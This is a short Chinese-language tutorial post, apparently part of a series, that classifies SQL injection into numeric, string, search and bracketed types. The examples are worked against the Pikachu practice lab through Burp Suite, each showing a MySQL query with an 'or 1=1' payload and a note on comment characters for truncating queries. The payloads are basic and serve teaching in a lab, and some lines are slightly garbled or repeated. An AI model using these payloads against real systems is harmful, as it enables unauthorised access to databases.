SQL注入攻擊技術(二)---注入分類
阿新 • • 發佈:2020-12-27
一、注入分類
用到網站:http://192.168.18.147:666/pikachu/index.php
開啟burp suite
1、數字型
有注入點就帶入注入漏洞進行操作
mysql> select username,email from member where id=1 or 1=1;(正常SQL語句)
2、字元型
正常情況下在資料庫中搜索是這樣的語句
mysql> select id,email from member where username='vince or 1=1';(or 1=1是萬能密碼的感覺有木有)
3、搜尋型
正常情況下在資料庫中搜索是這樣的語句
mysql> select * from member where username like '%vince%' or 1=1;
搜尋都是兩邊都帶%,不加or 1=1的時候只會出現一條資料,加入的話所有的資料都可以顯示出來,
在sql server中--是註釋,在mysql中#是註釋,如果不註釋的話就會報錯
4、XX型(也叫特殊型)
XX型是由於SQL語句拼接方式不同,注入語句如下:
mysql> select * from member where username=('xx') or 1=1;(其實後面的)
在注入的時候有時候也要看對方的程式碼是如何寫的
看看對方的程式碼是如何寫的